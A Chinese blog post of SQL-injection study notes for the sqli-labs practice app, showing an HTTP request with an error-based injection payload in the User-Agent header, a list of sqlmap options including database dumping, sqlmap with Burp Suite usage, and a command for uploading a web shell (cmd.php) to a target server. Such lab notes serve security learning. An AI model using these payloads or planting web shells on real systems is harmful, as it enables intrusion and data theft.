SQL注入-3

在登录成功的情况下

将特殊字符 依次输入到下面的每一行后面 测试存在注入的位置

POST /sqli-labs-master/Less-18/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0'+updatexml(1,concat(0x7e,database(),0x7e),1)+'
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/sqli-labs-master/Less-18/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Connection: keep-alive
Upgrade-Insecure-Requests: 1

uname=admin&passwd=0&submit=Submit

 

sqlmap 参数

-u 指定测试的URL

-r  将抓到的包解析

-g 从谷歌上查询内容

-c 加载配置文件

--methon= post /get

--data=DATA 指定post参数

--cookie=COOKIE 指定cookie

--load-cookies= 从一个文件里load一个cookie

--user-agent= 指定user-agent

--random-agent 自动指定一个user-agent

--proxy= 指定代理

--threads= 指定线程数量

-p TestParameter 可测试的参数

--skip 跳过某个参数

--dbms=DBMS 指定数据库类型

--no-cast

--tamper= 指定一个py文件

-b 打印当前数据库的banner

--dump 脱库

--sql-query=query 执行一个sql语句

 

sqlmap结合burpsuite进行注入(post类型)

 以下两种方式

第一种 将抓到的包右键 save item 得到一个文件

/users/margin/desktop/sqli 是指 文件的路径以及文件本身

--flush-session 清空缓存

第二种

右键查看网页源代码 找到表单的input标签 找到name 进行以下的操作

 

 

一句话木马

sqlmap -u  --file-write=需要上传的文件的本地目录 --file-dest=目标服务器的目录(c:\\www\sqli\less-1\cmd.php)

 

posted @ 2018-04-21 19:59  弟弟救我啊  阅读(98)  评论(0编辑  收藏  举报